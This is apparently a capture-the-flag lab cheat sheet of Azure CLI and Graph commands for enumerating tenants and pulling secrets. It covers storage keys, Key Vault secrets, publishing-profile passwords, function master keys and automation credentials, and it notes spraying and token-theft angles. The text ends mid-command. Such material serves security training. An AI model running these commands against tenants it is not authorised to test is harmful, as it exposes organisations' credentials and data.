Azure

1. Authentication & Setup

User

export EMAIL=''
export PASSWORD=''
az login -u "$EMAIL" -p "$PASSWORD" [--allow-no-subscriptions]
export SUBSCRIPTION_ID=$(az account show --query id --output tsv)
export TENANT_ID=$(az account show --query tenantId --output tsv)
export MY_OID=$(az ad signed-in-user show --query id -o tsv)

ARM (Service Principal Authentication)

export ARM_CLIENT_ID=''
export ARM_SECRET=''
export TENANT_ID='fdd066e1-ee37-49bc-b08f-d0e152119b04'
az login --service-principal -u "$ARM_CLIENT_ID" -p "$ARM_SECRET" --tenant "$TENANT_ID" [--allow-no-subscriptions]
export SUBSCRIPTION_ID=$(az account show --query id --output tsv)
export TENANT_ID=$(az account show --query tenantId --output tsv)
export MY_OID=$(az ad sp show --id $ARM_CLIENT_ID --query id -o tsv)

Connection Information

Displays details of the currently authenticated user.

az ad signed-in-user show

Lists all subscriptions accessible by the current user

az account list --output table

2. Account Enumeration

Groups

Enumeration Commands

Retrieves every group in the tenant.

az ad group list -o table

Retrieve Azure AD groups and directory roles assigned to the current identity.

az rest --method get --url "https://graph.microsoft.com/v1.0/me/memberOf" --query "value[].{Name:displayName, ID:id}" -o table

Get groups where the user is a member

az ad user get-member-groups --id $TARGET_EMAIL

List dynamic Azure AD groups (membership rule-based)

az ad group list \
--filter "groupTypes/any(c:c eq 'DynamicMembership')" \
--query "[].{displayName:displayName, rule:membershipRule}" \
-o table

Roles

Enumeration Commands

Get Entra ID roles assigned and its definition (One Liner)

for TARGET_ROLE_ID in $(az rest --method get --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'" --query "value[].roleDefinitionId" -o tsv | sort -u); do
    echo -e "\n\n[+] Checking Entra ID Directory Role ID: $TARGET_ROLE_ID"
    az rest --method GET -o json \
      --query "{RoleName:displayName, Description:description, Actions:rolePermissions[].allowedResourceActions[]}" \
      --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID"
done

Get Entra ID roles assigned and its definition (Manual)

az rest --method get --query "value[].{RoleID:roleDefinitionId, Scope:directoryScopeId}" -o table --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?\$filter=principalId eq '$MY_OID'"


# Get Role Definition Details
az rest --method GET -o json \
--query "{RoleName:displayName,Description:description, RoleID:id, Actions:rolePermissions[].allowedResourceActions[]}" \
--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/$TARGET_ROLE_ID"

List Azure Roles & Show Role actions definitions for a given scope (One Liner)

az role assignment list --assignee "$MY_OID" --include-inherited --include-groups --all --query "[].{id:roleDefinitionId, scp:scope}" -o tsv | while read -r role_id scope; do
    echo -e "\n\033[1;34m==== Inspecting Role: ${role_id##*/} ====\033[0m"
    echo -e "\033[1;33m[+] Scope:\033[0m $scope"
    # Fetch definition using the ID we just pulled
    az role definition show --id "$role_id" --query "{Name:roleName, Description:description, Actions:permissions[0].actions, DataActions:permissions[0].dataActions}" -o json
done

List Azure Roles & Show Role actions definitions for a given scope (Manual)

az role assignment list --include-inherited --include-groups --all \
  --query "[].{RoleName:roleDefinitionName, RoleID:roleDefinitionId, Scope:scope, Type:principalType}" \
  -o json --assignee "$MY_OID" 

  # Get Role Definition Details
az role definition show \
  --query "{RoleName:roleName, Description:description, RoleID:id, Actions:permissions[0].actions, NotActions:permissions[0].notActions}" \
  -o json  --id $TARGET_ROLE_ID

Find Custom Azure Roles

az role definition list --custom-role-only true --query "[].{roleName:roleName, name:name, actions:permissions[0].actions, dataActions:permissions[0].dataActions}"

Service Principals

Enumeration Commands

az ad sp list --all -o table \
  --query "[].{Name:displayName, ObjectId:id, AppId:appId, Type:servicePrincipalType, Enabled:accountEnabled, RedirectURIs:replyUrls}"

Users

Enumeration Commands

Enumerate EntraID Users

az ad user list --output table --query "[].{ID:id,UserPrincipalName:userPrincipalName,DisplayName:displayName}"

az rest --method GET -o json --url "https://graph.microsoft.com/v1.0/users" --query "value[].{ID:id, UPN:userPrincipalName, Name:displayName}" -o table

Resources

Get Resource List

az account set --subscription $SUBSCRIPTION_ID
az resource list --query "[].{Name:name, Type:type, ResourceGroup:resourceGroup}" --output table

# Through API REST
az rest --method GET --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resources?api-version=2021-04-01" \
  --query "value[].{Name:name, Type:type}" \
  -o table

Check what actions you can execute on every specific resource after all role inheritance and assignments are calculated.

RESOURCES_JSON=$(az rest --method GET --output json [--headers "Authorization=Bearer $MANAGEMENT_TOKEN"]\
  --url "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resources?api-version=2021-04-01")

# 2. Process each resource using jq
echo "$RESOURCES_JSON" | jq -c '.value[]' | while read -r resource; do
    # Extract variables from the JSON object
    RES_ID=$(echo "$resource" | jq -r '.id')
    RES_NAME=$(echo "$resource" | jq -r '.name')
    RES_TYPE=$(echo "$resource" | jq -r '.type')
    
    # Extract resource group from the resource ID string
    RES_RG=$(echo "$RES_ID" | sed -n 's/.*\/resourceGroups\/\([^\/]*\)\/.*/\1/p')

    # Visual separator
    echo "---"
    echo -e "\033[1;35m[#] Resource:\033[0m $RES_NAME"
    echo -e "\033[1;36m[+] Type:\033[0m      $RES_TYPE"
    echo -e "\033[1;32m[+] Group:\033[0m     $RES_RG"

    # 3. Fetch the permissions JSON using az rest and your manual token
    PERMS_JSON=$(az rest --method GET --output json [--headers "Authorization=Bearer $MANAGEMENT_TOKEN"]\
        --url "https://management.azure.com${RES_ID}/providers/Microsoft.Authorization/permissions?api-version=2022-04-01")

    # 4. Show standard Actions
    echo -e "\033[1;33m[!] Actions:\033[0m"
    echo "$PERMS_JSON" | jq -r '.value[].actions[]' 2>/dev/null | sort -u | sed 's/^/  - /'

    # 5. Show Data Actions
    echo -e "\033[1;33m[!] Data Actions:\033[0m"
    echo "$PERMS_JSON" | jq -r '.value[].dataActions[]' 2>/dev/null | sort -u | sed 's/^/  - /'
done

Identities

Enumeration Commands

List managed identities in the resource group

az identity list -o table --resource-group $RESOURCE_GROUP

Storage accounts

Enumeration Commands

Enumerate storage accounts

az storage account list \
  --query "[].{Name:name, PublicAccess:allowBlobPublicAccess, HttpsOnly:enableHttpsTrafficOnly, MinTLS:minimumTlsVersion,IsHnsEnabled:isHnsEnabled, FTPEnabled:isSftpEnabled, LocalUserEnabled:isLocalUserEnabled, Firewall:networkRuleSet.defaultAction, BlobEndpoint:primaryEndpoints.blob, Location:location}" \
  -o table --resource-group $RESOURCE_GROUP
  
STORAGE_ACCOUNT_NAME=$(az storage account list --query "[0].name" -o tsv --resource-group $RESOURCE_GROUP)

In case case Firewall is set to "Deny", execute the following command to check the allowed roules.

az storage account show \
  --name $STORAGE_ACCOUNT_NAME \
  --resource-group $RESOURCE_GROUP \
  --query networkRuleSet \
  --output json

Enumerate keys

az storage account keys list \
  --resource-group $RESOURCE_GROUP \
  --account-name $STORAGE_ACCOUNT_NAME
  
ACCESS_KEY=$(az storage account keys list -g $RESOURCE_GROUP -n $STORAGE_ACCOUNT_NAME --query "[0].value" -o tsv)

Containers

Enumeration Commands

Enumerate storage containers for a given account

az storage container list --include-deleted \
--query "[].{Name:name, PublicAccess:properties.publicAccess, Metadata:metadata, LastModified:properties.lastModified,Deleted:deleted,Verion:version}" \
-o table --account-name $STORAGE_ACCOUNT_NAME \
[--auth-mode login | --account-key $ACCESS_KEY]

Enumerate files inside the container

az storage blob list \
  --include v \
  --query "[].{Name:name,VersionId:versionId, IsCurrent:isCurrentVersion, Size:properties.contentLength, Type:properties.contentType, LastModified:properties.lastModified, MD5:properties.contentSettings.contentMd5}" \
  --output table \
  --account-name $STORAGE_ACCOUNT_NAME --container-name <CONTAINER_NAME> \
  [--auth-mode login]

Download the file

az storage blob download \
--account-name $STORAGE_ACCOUNT_NAME \
--container-name <CONTAINER_NAME> \
--name <FILE_NAME> \
--file <DESTINATION_NAME> \
[--auth-mode login \]
[--version-id "2026-05-07T06:54:11.8141618Z" \]

Script to check all the storage accounts, its containers and the files inside them

export RESOURCE_GROUP=
export STORAGE_ACCOUNT_NAME=
# 1. Get all storage accounts in the resource group
az storage account list --resource-group $RESOURCE_GROUP --query "[].name" -o tsv | while read -r ACCOUNT_NAME; do
    echo -e "\n\033[1;32m============================================================\033[0m"
    echo -e "\033[1;32m[!] TARGET STORAGE ACCOUNT: $STORAGE_ACCOUNT_NAME\033[0m"
    
    # 2. Retrieve Important Security Information (Account Level)
    az storage account show --name "$STORAGE_ACCOUNT_NAME" --resource-group iam-azure-labs \
      --query "{Name:name, PublicAccess:allowBlobPublicAccess, FW_Default:networkRuleSet.defaultAction, BlobUrl:primaryEndpoints.blob}" -o table

    # 3. Enumerate Containers
    echo -e "\033[1;33m[+] Enumerating Containers for $STORAGE_ACCOUNT_NAME...\033[0m"
    CONTAINERS=$(az storage container list --account-name "$STORAGE_ACCOUNT_NAME" --auth-mode login --query "[].name" -o tsv 2>/dev/null)

    if [ -z "$CONTAINERS" ]; then
        echo -e "\033[0;31m    [-] Access Denied or No Containers Found.\033[0m"
    else
        for CONTAINER in $CONTAINERS; do
            echo -e "\n  \033[1;40m[#] CONTAINER: $CONTAINER\033[0m"
            
            # 4. Data Discovery: Retrieve Blobs (Files) within the container
            echo -e "  \033[1;36m[>] Files Found (Data Discovery):\033[0m"
            az storage blob list --account-name "$STORAGE_ACCOUNT_NAME" --container-name "$CONTAINER" \
              --auth-mode login --query "[].{FileName:name, Size:properties.contentLength, Type:properties.blobType, Modified:properties.lastModified}" -o table
        done
    fi
done

File Shares

Enumeration Commands

Enumerate Shares

az storage share list -o table \
  --include-snapshots --include-metadata \
  --query "[].{Name:name, Snapshot:snapshot, Modified:properties.lastModified, Metadata:metadata}" \
  --account-name $STORAGE_ACCOUNT_NAME \
  [--account-key $ACCESS_KEY]

az storage share-rm list --include-deleted -o table \
  --resource-group $RESOURCE_GROUP \
  --query "[].{Name:name, IsDeleted:deleted, Version:version, DateDeleted:deletedTime, DaysLeft:remainingRetentionDays}" \
  --account-name $STORAGE_ACCOUNT_NAME \
  [--account-key $ACCESS_KEY]

Enumerate Files inside the Dir

az storage file list -o table \
  --account-name $STORAGE_ACCOUNT_NAME \
  --share-name $SHARE_NAME  \
  [--account-key $ACCESS_KEY]

Download the file

az storage file download \
  --account-name $STORAGE_ACCOUNT_NAME \
  --share-name <SHARE_NAME> \
  --path <FILE_NAME> \
  --dest ./flag.txt \
  [--account-key $ACCESS_KEY]

Enumerate snapshots

az storage share snapshot \
  --name $SHARE_NAME \
  --account-name $STORAGE_ACCOUNT_NAME

For each snapshot in the share name, enumerate its files

#ACCOUNT_NAME=$1
SHARE_NAME=file-share-lab-4

SNAPSHOTS=$(az storage share list \
    --account-name "$STORAGE_ACCOUNT_NAME" \
    --include-snapshots \
    --query "[?name=='$SHARE_NAME' && snapshot != null].snapshot" \
    -o tsv)

if [ -z "$SNAPSHOTS" ]; then
    echo "No snapshots found for this share."
fi

## 2. Iterate through each snapshot and list the files
for SNAP in $SNAPSHOTS; do
    echo "----------------------------------------------------"
    echo "SNAPSHOT VERSION: $SNAP"
    echo "----------------------------------------------------"
    
    az storage file list \
        --account-name "$STORAGE_ACCOUNT_NAME" \
        --share-name "$SHARE_NAME" \
        --snapshot "$SNAP" \
        --output table
    
    echo -e "\n"
done

Applications

Enumeration Commands

Enumerate applcations and miss configurations

az rest --method get --url "https://graph.microsoft.com/v1.0/applications"   --query "value[].{Name:displayName, AppID:appId, ObjID:id, Public:isFallbackPublicClient, ImpAccess:web.implicitGrantSettings.enableAccessTokenIssuance, ImpID:web.implicitGrantSettings.enableIdTokenIssuance, Redirects:web.redirectUris[0]}"   -o table

Implicit Grant (ImpAccess / ImpID)

The Risk: If enableAccessTokenIssuance or enableIdTokenIssuance is true, the application is using the Implicit Flow.
Attack: This flow is legacy and insecure. Tokens are returned directly in the URL fragment (after the #), making them susceptible to theft via browser history, logs, or Referer headers.

Public Client (Public)

The Risk: If this is true (or isFallbackPublicClient is enabled), the application is considered a "Public Client" (like a mobile app or a script).
Attack: These apps do not require a Client Secret to authenticate. If you find a valid username/password (via spraying), you can often authenticate directly against this App ID without needing a secret.

Redirect URIs (Redirects)

The Risk: These are the URLs where Azure sends the auth token after login.
Attack:
- Open Redirects: If a URI is overly broad (e.g., [https://example.com/](https://example.com/)*), you might be able to craft a link that sends the token to a server you control.
- Subdomain Takeover: If one of the listed URLs points to a dead subdomain, you can claim that subdomain and hijack any tokens sent to it.

Required Resource Access (Permissions)

If you want to see what this application is actually allowed to do (e.g., "Read all Mail," "Directory.ReadWrite.All"), add this to the query:

Perms:requiredResourceAccess[].resourceAccess[].id

See the application's permissions and internal identifier URIs (great for finding internal domain names

az rest --method get --url "https://graph.microsoft.com/v1.0/applications" \
  --query "value[].{Name:displayName, AppID:appId, Identifiers:join(', ', identifierUris), Permissions:requiredResourceAccess[].resourceAccess}" \
  -o json

Identify the target app

APP_ID=$(az ad app list --query "[?contains(displayName, 'azure-applications-lab-1-phishing-app')].appId | [0]" -o tsv); echo "$APP_ID"

Identify users or service principals that have administrative rights over this application.

az ad app owner list \
  --query "[].{Name:displayName, Type:principalType, UPN:userPrincipalName, ID:id}" \
  -o table --id "$APP_ID"

KeyVault

More commands

az keyvault list --resource-group $RESOURCE_GROUP --query "[].{Name:name, URI:properties.vaultUri, Public:properties.publicNetworkAccess, RBAC_Off:properties.enableRbacAuthorization, PolicyCount:length(properties.accessPolicies || '[]')}" --output table

Who has access to the key vault

az keyvault show --name $KEYVAULT_NAME --query "properties.accessPolicies[].{OID:objectId, Permissions:permissions.secrets}" --output table

Enumerate KeyVault keys

az keyvault key list --vault-name $KEYVAULT_NAME

Enumerate KeyVault secrets

az keyvault secret list --query "[].{name:name}" -o tsv --vault-name $KEYVAULT_NAME

VMs

Enumeration Commands

# If Error "does not have authorization to perform action 'Microsoft.Network/networkInterfaces/read" remove "--show-details"
az vm list --show-details --query "[].{Name:name, RG: resourceGroup, OS:storageProfile.osDisk.osType, PublicIP:publicIps, PrivateIP:privateIps, Status:powerState, Identity:identity.type, Size:hardwareProfile.vmSize}" --output table

Obtain Machine user identities

az vm show \
  --name "$VM_NAME" \
  --resource-group "$RESOURCE_GROUP" \
  --query "{SystemIdentityOID:identity.principalId, UserIdentities:identity.userAssignedIdentities}" \
  --output json

Disks

Enumeration Commands

az disk list --query "[].{
    Name: name,
    RG: resourceGroup,
    SizeGB: diskSizeGb,
    State: managedBy == \`null\` && 'UNATTACHED' || 'Attached',
    VM: managedBy,
    Encryption: encryption.type,
    NetworkPolicy: networkAccessPolicy,
    PublicAccess: publicNetworkAccess,
    CreatedFrom: creationData.sourceResourceId
}" --output table --resource-group "$RESOURCE_GROUP"

Table Storage

Enumeration Commands

MSSQL

Enumeration Commands

Enumerate servers

az sql server list --expand-ad-admin --query "[].{Name:name, FQDN:fullyQualifiedDomainName, PublicAccess:publicNetworkAccess,restrictOutboundNetworkAccess:restrictOutboundNetworkAccess, ResourceGroup:resourceGroup, Admin:administratorLogin, EntraAdmin:externalAdministrator.login, AdminType:externalAdministrator.principalType, AdminSID:externalAdministrator.sid}" --output table

Identify information from a given server

# List Server Usages
az sql server list-usages --name $SQL_SERVER --resource-group $RESOURCE_GROUP

# List Server Firewalls
az sql server firewall-rule list --output table \
  --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \
   --resource-group $RESOURCE_GROUP --server $SQL_SERVER

# List of Azure Active Directory administrators in a server.
az sql server ad-admin list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Admin:login, Type:principalType, Tenant:tenantId, SID:sid}" --output table

 # Gets an advanced threat protection
az sql server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --name $SQL_SERVER --output json
 # DNS Aliases
az sql server dns-alias list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{Alias:name}" --output table
 
 # Server Keys
az sql server key list --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "[].{KeyName:name, URI:uri, Type:serverKeyType}" --output table

 #Server Encryption Protecto
az sql server tde-key show --resource-group $RESOURCE_GROUP --server $SQL_SERVER --query "{KeyName:serverKeyName, Type:serverKeyType}" --output json

Obtian information from the database perspective

 # List databases
az sql db list --query "[].{Name:name, Status:status, Tier:sku.tier, Ledger:ledgerOn, InfraEncrypt:isInfraEncryptionEnabled, Backup:currentBackupStorageRedundancy}" --output table --server $SQL_SERVER --resource-group $RESOURCE_GROUP

 # List deleted SQL databases
az sql db list-deleted --server $SQL_SERVER --resource-group $RESOURCE_GROUP

 # DB Metada Info
az sql db show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP --query "{Name:name, TDE:transparentDataEncryption.status, Ledger:ledgerConfiguration.ledgerState, Identity:identity.type, ZoneRedundant:zoneRedundant, CreateDate:creationDate,isInfraEncryptionEnabled:isInfraEncryptionEnabled}" --output json

 # DB Usage
az sql db list-usages --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP \
--query "[].{Metric:displayName, CurrentValue:currentValue, Limit:limit, Unit:unit}" \
--output table

 # Threat Policy 
az sql db threat-policy show --name $DB_NAME --server $SQL_SERVER --resource-group $RESOURCE_GROUP

 # Data Masking
az rest --method GET --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default?api-version=2021-11-01" | jq .

az rest --method get --uri "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Sql/servers/$SQL_SERVER/databases/$DB_NAME/dataMaskingPolicies/Default/rules?api-version=2021-11-01" | jq .

 # Row Policies
sqlcmd -S $SQL_SERVER.database.windows.net -d $DB_NAME -U "$DB_USER" -P "$DB_PASSWORD" \
-W -s "," -Q "SELECT sp.name, sp.is_enabled, OBJECT_NAME(sp.object_id) AS TableName, sp2.predicate_definition FROM sys.security_policies AS sp JOIN sys.security_predicates AS sp2 ON sp.object_id = sp2.object_id;" \
| column -s, -t

MySQL

Enumeration Commands

Enumerate Database Servers

az mysql flexible-server list --output table --resource-group $RESOURCE_GROUP --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Port:databasePort, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, HA:highAvailability.mode, Tier:sku.tier}"

Enumerate Databases

az mysql flexible-server db list --output table\
  --query '[].{Name:name,collation:collation,resourceGroup:resourceGroup,systemData:systemData}' \
  --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

FIrewall Rules

az mysql flexible-server firewall-rule list --query "[].{RuleName:name, Start:startIpAddress, End:endIpAddress}" --output table \
--resource-group $RESOURCE_GROUP --name $SERVER_NAME

List AD admins and users

az mysql flexible-server ad-admin list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME
az mysql flexible-server identity list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

List backups and replicas

az mysql flexible-server backup list --resource-group $RESOURCE_GROUP --name $SERVER_NAME

az mysql flexible-server replica list --resource-group $RESOURCE_GROUP --name $SERVER_NAME

Enumerate Monitoring Mechanisms

Get the server's advanced threat protection setting

az mysql flexible-server advanced-threat-protection-setting show --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

Audit Logging Enabled

az mysql flexible-server parameter show --name "audit_log_enabled" \
--query "{Parameter:name, Status:value}" \
--resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

List all of the maintenances of a flexible server

az mysql flexible-server maintenance list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

List log files for a server

az mysql flexible-server server-logs list --resource-group $RESOURCE_GROUP --server-name $SERVER_NAME

PostgreSQL

Enumeration Commands

Database Servers

az postgres flexible-server list --output table \
  --query "[].{Server:name, FQDN:fullyQualifiedDomainName, Version:version, Admin:administratorLogin, PublicAccess:network.publicNetworkAccess, EntraAuth:authConfig.activeDirectoryAuth, PwdAuth:authConfig.passwordAuth, Tier:sku.tier}" \
  --resource-group $RESOURCE_GROUP

Databases

az postgres flexible-server db list \
  --resource-group $RESOURCE_GROUP \
  --server-name $SERVER_NAME \
  --query "[].{Name:name, ResourceGroup:resourceGroup, SystemData:systemData}" \
  --output table

Enumerate Firewalls

az postgres flexible-server firewall-rule list \
  --query "[].{Rule:name, Start:startIpAddress, End:endIpAddress}" \ 
  --output table \
   --resource-group $RESOURCE_GROUP --name $SERVER_NAME

CosmosDB

Enumeration Commands

Enumerate Instances

az cosmosdb list -o table \
  --query "[].{Name:name, Kind:kind, Endpoint:documentEndpoint, PublicAccess:publicNetworkAccess, NetworkBypass:networkAclBypass, Location:location,NoVnet:isVirtualNetworkFilterEnabled, LocalAuth:disableLocalAuth}" \
  --resource-group $RESOURCE_GROUP

Obtain keys

az cosmosdb keys list --resource-group $RESOURCE_GROUP --name $SERVER_NAME

MongoDB

Enumeration Commands

az cosmosdb list --resource-group $RESOURCE_GROUP \
  --query "[].{Name:name, Kind:kind, PublicAccess:publicNetworkAccess, LocalAuth:disableLocalAuth, IpRules:ipRules, Endpoint:documentEndpoint}" \
  -o table

App Services

Enumeration Commands

az webapp list --query "[].{Name:name,resourcegroup:resourceGroup, Host:defaultHostName, SCM:enabledHostNames[1], HTTPS_Only:httpsOnly, Runtime:siteConfig.linuxFxVersion || siteConfig.windowsFxVersion,State:state, Public_Access:publicNetworkAccess, Identity:identity.type, ClientCert:clientCertMode,CORS:cors,RemoteDebug:remoteDebuggingEnabled, WebSockets:webSocketsEnabled}" --output json

Get the App Settings (API Keys, DB Strings, etc.)

az webapp config appsettings list --resource-group $RESOURCE_GROUP --name $WEBAPP_NAME

Retrieves the publishing profiles

az webapp deployment list-publishing-profiles \
  --name $WEBAPP_NAME \
  --resource-group $RESOURCE_GROUP \
  --query "[].{Profile:profileName, Method:publishMethod, URL:publishUrl, User:userName, Password:userPWD,SQLServerDBConnectionString:SQLServerDBConnectionString,destinationAppUrl:destinationAppUrl}" \
  -o json

Azure Container Registry

Enumeration Commands

az acr list --query "[].{Name:name, Server:loginServer, SKU:sku.name, PublicAccess:publicNetworkAccess, AdminUser:adminUserEnabled, AnonPull:anonymousPullEnabled, Region:location}" -o table

Function Apps

Enumeration Commands

az functionapp list --query "[].{Name:name,defaultHostName:defaultHostName,hostNames:hostNames,hostNamesDisabled:hostNamesDisabled, RG:resourceGroup, Runtime:functionAppConfig.runtime.name, Identity:identity.type, PrincipalID:identity.principalId, StorageURL:functionAppConfig.deployment.storage.value, HTTPS:httpsOnly}" -o json

List functions

az functionapp function list -o table \
  --query "[].{Name:name, Trigger:config.bindings[0].type, Queue:config.bindings[0].queueName, Script:config.scriptFile,functionDirectory:config.functionDirectory,Language:language,href:href}" \
  --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP

Get details about the source of the function code

az functionapp deployment source show \
--name $FUNCTION_NAME --resource-group $RESOURCE_GROUP

Retrieve the publishing profiles for a specific Azure Function App

az functionapp deployment list-publishing-profiles --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP

Get SCM credentials

az functionapp deployment list-publishing-credentials --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP

Get function, system and master keys

az functionapp keys list --name $FUNCTION_NAME --resource-group $RESOURCE_GROUP

Static Web Apps

Enumeration Commands

az staticwebapp list --query "[].{Name:name, ResourceGroup:resourceGroup, Hostname:defaultHostname, PublicAccess:publicNetworkAccess, SKU:sku.name, Identity:identity, KeyVaultId:keyVaultReferenceIdentity, ConfigUpdates:allowConfigFileUpdates, StagingPolicy:stagingEnvironmentPolicy, Backends:linkedBackends}" --output table

Get appsettings

az staticwebapp appsettings list --name $WEBAPP_NAME

Get env information

az staticwebapp environment list --name $WEBAPP_NAME
az staticwebapp environment functions --name $WEBAPP_NAME
az staticwebapp secrets list --name $WEBAPP_NAME

Get current snippets

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/snippets?api-version=2022-03-01"

Get database connections

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Web/staticSites/$WEBAPP_NAME/databaseConnections?api-version=2021-03-01"

Azure Container Registry (ACR)

Enumeration Commands

az acr list --query "[].{Name:name,loginServer:loginServer, AdminUser:adminUserEnabled, PublicAccess:publicNetworkAccess, AnonPull:anonymousPullEnabled, SKU:sku.tier, TrustPolicy:policies.trustPolicy.status, Encryption:encryption.status, resourceGroup:resourceGroup}" --output table

List of all authentication tokens

az acr token list --registry $ACR_NAME --resource-group $RESOURCE_GROUP

Retrieve recently deleted repositories

az acr repository list-deleted --name $ACR_NAME

Retrieve active repositories

az acr repository list --name $ACR_NAME --resource-group $RESOURCE_GROUP

List tasks runs

az acr task list --output table \
  --query "[].{Name:name, Identity:identity.type, Source:step.contextPath, Schedule:trigger.timerTriggers[0].schedule, Status:status, imageName:step.imageNames}"  \
   --registry $ACR_NAME

Azure Container Instances

Enumeration Commands

az container list --query "[].{Name:name, ResourceGroup:resourceGroup, FQDN:ipAddress.fqdn, PublicIP:ipAddress.ip, Port:ipAddress.ports[0].port, Identity:identity.type, Image:containers[0].image, OS:osType, Registry:imageRegistryCredentials[0].server}" --output json

Queue Storage

Enumeration Commands

az storage account list --query "[].{Name:name, ResourceGroup:resourceGroup, PublicBlob:allowBlobPublicAccess, SharedKey:allowSharedKeyAccess, NetDefaultAction:networkRuleSet.defaultAction, PublicNetwork:publicNetworkAccess, MinTLS:minimumTlsVersion, OAuthOnly:defaultToOAuthAuthentication}" -o table

az storage queue list --account-name $STORAGE_ACCOUNT_NAME [--auth-mode login]

Automation Accounts

Enumeration Commands

az automation account list --output json --query "[].{name:name,description:description,publicNetworkAccess:publicNetworkAccess,privateEndpointConnections:privateEndpointConnections,disableLocalAuth:disableLocalAuth,identity:identity}"

Get keys of automation account. These are used for the DSC

az automation account list-keys --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP

Get schedules of automation account

az automation schedule list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP

Get jobs of an automation account

az automation job list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP

Get runbooks of an automation account

az automation runbook list --automation-account-name $AUTOMATION_NAME --resource-group $RESOURCE_GROUP

Get runbook content

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/runbooks/$RUNBOOK_NAME/content?api-version=2023-11-01"

Get variables of automation account. It's possible to get the value of unencrypted variables but not the encrypted ones.

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/variables?api-version=2023-11-01"

Get credentials of automation account

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials?api-version=2023-11-01"

Get credential details. Note that you will only be able to access the password from inside a Runbook

az rest --method GET \
  --url "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Automation/automationAccounts/$AUTOMATION_NAME/credentials/<credential-name>?api-version=2023-11-01"

Service Bus

Enumeration Commands

az servicebus namespace list -o table --query "[].{name:name,publicNetworkAccess:publicNetworkAccess,serviceBusEndpoint:serviceBusEndpoint,disableLocalAuth:disableLocalAuth,resourceGroup:resourceGroup}"

Namespace Enumeration

az servicebus namespace network-rule-set list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME
az servicebus namespace private-endpoint-connection list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME
az servicebus namespace exists --name $BUS_NAME

Authorization Rule Enumeration

az servicebus namespace authorization-rule list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME --query "[].{name:name,rights:rights}"
az servicebus namespace authorization-rule keys list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME

Queue Enumeration

az servicebus queue list --resource-group $RESOURCE_GROUP --namespace-name $BUS_NAME

Topic Enumeration

az servicebus topic list \
  --resource-group $RESOURCE_GROUP \
  --namespace-name $BUS_NAME \
  --query "[].{TopicName:name, Status:status, ActiveMsgs:countDetails.activeMessageCount, DeadLetterMsgs:countDetails.deadLetterMessageCount, Partitioning:enablePartitioning}" \
  --output table

Susbscription Enumeration

az servicebus topic subscription list \
  --resource-group $RESOURCE_GROUP \
  --namespace-name $BUS_NAME \
  --topic-name labtopic \
  --query "[].{Subscription:name, Status:status, ActiveCount:countDetails.activeMessageCount, DeadLetterCount:countDetails.deadLetterMessageCount, RequiresSession:requiresSession}" \
  --output table

Logic Apps

Enumeration Commands

Virtual Desktop

Enumeration Commands

az desktopvirtualization hostpool list   --query "[].{Name:name, description:description, ResourceGroup:resourceGroup, Type:hostPoolType, LBType:loadBalancerType, MaxSessions:maxSessionLimit, AADJoin:customRdpProperty}"   --output table

Monitoring Logs

Enumeration Commands

Get The Flag

KeyVault

KEYVAULT_NAME=$(az keyvault list --query "[0].name" -o tsv)
SECRET_NAME=$(az keyvault secret list --vault-name "$KEYVAULT_NAME" --query "[0].name" -o tsv)
az keyvault secret show --vault-name "$KEYVAULT_NAME" --name "$SECRET_NAME"

Blob

STORAGE_ACCOUNT_NAME=$(az storage account list --resource-group iam-azure-labs --query "[0].name" -o tsv)
az storage container list \
